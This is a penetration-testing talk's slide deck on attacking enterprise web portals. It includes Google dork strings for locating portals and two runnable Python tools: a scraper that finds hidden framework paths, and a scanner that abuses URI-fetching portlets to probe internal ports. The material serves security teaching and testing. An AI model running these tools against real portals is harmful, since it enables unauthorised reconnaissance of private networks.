Enterprise Portals




Gate to the Gold
`whoami`
• SensePost
  - Specialist security firm based in Pretoria
  - Customers all over the globe
  - Talks / papers / books
• ian@sensepost.com
  - Associate security analyst
  - I break stuff and write reports about breaking stuff
• Why this talk?
EP Vendors
• IBM WebSphere Portal
• SAP NetWeaver Portal
• Oracle portal products (Plumtree, BEA, Sun, ...)
• OpenText Portal (formerly Vignette)
• JBoss Portal
• Microsoft SharePoint Server
• Apache Jetspeed, Interwoven TeamPortal, ...
EP Overview
• Frequent on intranets.
• Also frequent on the Internet :)
• Framework for integrating information, people and processes
• Consolidate and summarise diverse sources of information
• Provide a customisable home page for registered users
EP Overview
• Popular platform for deploying applications because of the framework and the built-in functionality
• Provide SDKs for customisation and for deploying custom applications
• Support pluggable components called portlets
• Generally J2EE-based, but there are some alternative platforms (e.g. .NET, PHP, ...)
Portlet Overview
• Pluggable user interface components which are managed and displayed in a portal
• Fragments of markup (e.g. HTML / XML) which are aggregated into a portal page
• Adhere to various standards
  - WSRP (Web Services for Remote Portlets)
  - Java Portlet Specification
    - JSR 168
    - JSR 286
  - Proprietary

[Figure: a portlet fetching a back-end resource on the user's behalf. The sketch shows the portal receiving GET /moo?portlet=id&URI=http%3A%2F%2FHR%2Fbaa and answering HTTP 200 OK; the URI parameter names the resource the portlet fetches.]
Functionality++
• User registration
• Portals are generally designed to share information, so they provide functionality for searching documents, users, ...
• Workflow components
• Messaging / social networking
• Configuration and administrative components
Common Shortcomings
• Generally cater for multiple portal applications
  - May expose intranet applications to the Internet
• Frequently allow registration for public users -> Functionality++
• Because J2EE application servers are complex to install (and sys-admins are lazy), they frequently run with elevated privileges
Common Shortcomings
• Diverse log-in capabilities
  - LDAP, XML, database, ... and any of them may be wired up as SSO
• Developers of custom applications deployed on portal platforms frequently have not considered the underlying functionality of the platform
• Custom error pages defined for the platform
• Complexity++
Breaking Out
• Custom applications frequently exploit functionality of the portal framework but don't allow users direct access to framework functions
• ... or do they?
Breaking Out
• Direct object access
• Google is your friend :>
• Forcing errors to display the generic portal error messages
• Accessing site registration
• HTML source comments and JavaScript
• Once we can break out of the custom application, we expose the full functionality of the portal
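To make the "HTML source comments and JavaScript" route concrete, here is an added Python helper; it is not from the talk and not SensePost code. It pulls HTML comments, inline JavaScript and href/src/action attributes out of a page and keeps every same-host path that falls outside the custom application's URL prefix. Those leftover paths are the framework entry points the custom application never meant to link to. The sample page is constructed for the example; its /portal/site and template.REGISTER paths echo the search strings on the Finding Portals slide, and the /apps/expenses/ application prefix and the portal.example host are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page for the example; it does not come from any real portal.
SAMPLE_HTML = """
<html><head>
<script src="/portal/js/framework.js"></script>
<!-- TODO remove before go-live: admin console at /portal/site/admin -->
<script>var registerUrl = "/portal/site/template.REGISTER";</script>
</head><body>
<img src="img/logo.gif">
<a href="/apps/expenses/list">Expenses</a>
<form action="/apps/expenses/submit" method="post"></form>
<a href="http://cdn.example/lib.js">third-party script</a>
</body></html>
"""

# A URL path: slash-separated segments of word characters, dots and dashes.
PATH_RE = re.compile(r"/(?:[\w.-]+/)*[\w.-]+")


class SourceHarvester(HTMLParser):
    """Collect comments, inline script text and URL-bearing attributes."""

    def __init__(self):
        super().__init__()
        self.comments = []
        self.scripts = []
        self.urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if name in ("href", "src", "action") and value:
                self.urls.append(value)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands over <script> bodies as raw text, so we can grep them.
        if self._in_script and data.strip():
            self.scripts.append(data)

    def handle_comment(self, data):
        self.comments.append(data.strip())


def find_framework_paths(html, page_url, app_prefix):
    """Return sorted same-host paths referenced by the page that sit outside app_prefix.

    Off-host references (CDNs, third parties) are dropped; anything on the portal
    host but outside the custom application is a candidate framework entry point.
    """
    harvester = SourceHarvester()
    harvester.feed(html)
    harvester.close()
    candidates = list(harvester.urls)
    for text in harvester.comments + harvester.scripts:
        candidates.extend(PATH_RE.findall(text))
    host = urlsplit(page_url).netloc
    found = set()
    for raw in candidates:
        parts = urlsplit(urljoin(page_url, raw))   # resolve relative references
        if parts.netloc != host or parts.path.startswith(app_prefix):
            continue
        found.add(parts.path)
    return sorted(found)


if __name__ == "__main__":
    for path in find_framework_paths(SAMPLE_HTML, "http://portal.example/apps/expenses/home", "/apps/expenses/"):
        print(path)
```

Feed it the response bodies from a crawl of the custom application; each path it reports is somewhere to try the other bullets on this slide (request it directly, force an error on it, see whether registration is reachable).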
Finding Portals
• Google hacks (nods at Johnny Long)
• site:, insite:, inurl:, ...
• Demo
  - site:za
  - inurl:/portal/site
  - inurl:/template.REGISTER
Abusing Portlets
• Original advisory pertaining to IBM WebSphere
  - WebSphere, 2006/01/24, EPAM Systems
• Port scanning
• Accessing protected resources
• Attacks on third parties
• Blended attack scenarios
  - Denial of service
  - Brute force
  - Attacks against other protocols
PortletSuite.tgz
• PortletScan.py
  - Scans for open ports by abusing portlets
• Pikto.py
  - Scans for common virtual directory names and web server misconfigurations
• PorProx.py
  - Provides proxy server functionality, tunnelling HTTP requests through remote portlets
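As an added illustration of the port-scanning abuse on the Abusing Portlets slide and of what PortletScan.py does in principle, here is a small Python scanner written for this page; it is neither SensePost's tool nor vendor code. It drives a portlet that fetches whatever URI it is handed, pointing it at http://host:port/ for each port and reading the portal's reply as an oracle. The portal base URL, the /moo path and the portlet and URI parameter names follow the request sketched on the Portlet Overview slide; the error phrases used to tell closed from filtered ports are assumptions, because each portal words its generic error page differently.

```python
import time
import urllib.error
import urllib.parse
import urllib.request

# Assumed endpoint shape, after the request sketched on the Portlet Overview
# slide: GET /moo?portlet=<id>&URI=<url-encoded target>.
PORTLET_PATH = "/moo"
PORTLET_PARAM = "portlet"
URI_PARAM = "URI"

# Assumed (constructed) phrases a portal's generic error page might contain when
# the portlet's own fetch fails; adjust them after looking at one real failure.
CLOSED_MARKERS = ("connection refused", "could not connect")
FILTERED_MARKERS = ("timed out", "read timeout")


def build_probe(portal_base, portlet_id, host, port):
    """Return the portal URL that makes the portlet fetch http://host:port/ for us."""
    target = f"http://{host}:{port}/"
    query = urllib.parse.urlencode({PORTLET_PARAM: portlet_id, URI_PARAM: target})
    return f"{portal_base.rstrip('/')}{PORTLET_PATH}?{query}"


def http_fetch(url, timeout):
    """Fetch url and return (status, body_text, elapsed_seconds).

    HTTP error statuses are returned rather than raised so they can be classified;
    transport failures (including our own timeout) are reported as status 0.
    """
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace"), time.monotonic() - start
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read().decode("utf-8", "replace"), time.monotonic() - start
    except (urllib.error.URLError, OSError):
        return 0, "", time.monotonic() - start


def classify(status, body, elapsed, timeout):
    """Map the portal's reply to the state of the remote port.

    The portal usually answers 200 whatever happened; the signal is in the body
    and the latency. A quick reply carrying a connection error means closed; a
    reply that took about as long as our timeout, or that the portal flagged as
    a timeout, means filtered (or a service that never speaks first); anything
    else means something accepted the connection.
    """
    lowered = body.lower()
    if any(marker in lowered for marker in CLOSED_MARKERS):
        return "closed"
    if any(marker in lowered for marker in FILTERED_MARKERS) or elapsed >= timeout:
        return "filtered"
    if status == 0:
        return "unknown"   # the portal itself could not be reached
    return "open"


def scan(portal_base, portlet_id, host, ports, fetch=http_fetch, timeout=5.0):
    """Probe each port on host through the portlet; returns {port: state}."""
    results = {}
    for port in ports:
        status, body, elapsed = fetch(build_probe(portal_base, portlet_id, host, port), timeout)
        results[port] = classify(status, body, elapsed, timeout)
    return results


if __name__ == "__main__":
    # Assumed portal and internal host; this needs network access to do anything.
    print(scan("http://portal.example", "id", "hr", [22, 80, 443, 8080]))
```

The same probe with a different URI gives the other items on the Abusing Portlets slide: an internal URL that the firewall hides from you ("accessing protected resources"), or a loop over directory names instead of ports (what Pikto.py does). On the defending side the fix is in the portlet, not the network: a portlet that fetches caller-supplied URIs needs an allowlist of hosts and schemes, and its failures should not be echoed back verbatim.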
PortletSuite.tgz
• http://www.sensepost.com/blog
• Demo
  - Breaking out
  - Portlet scanning
  - Pikto
  - Accessing protected resources
  - PortletProx
Questions?

ian@sensepost.com
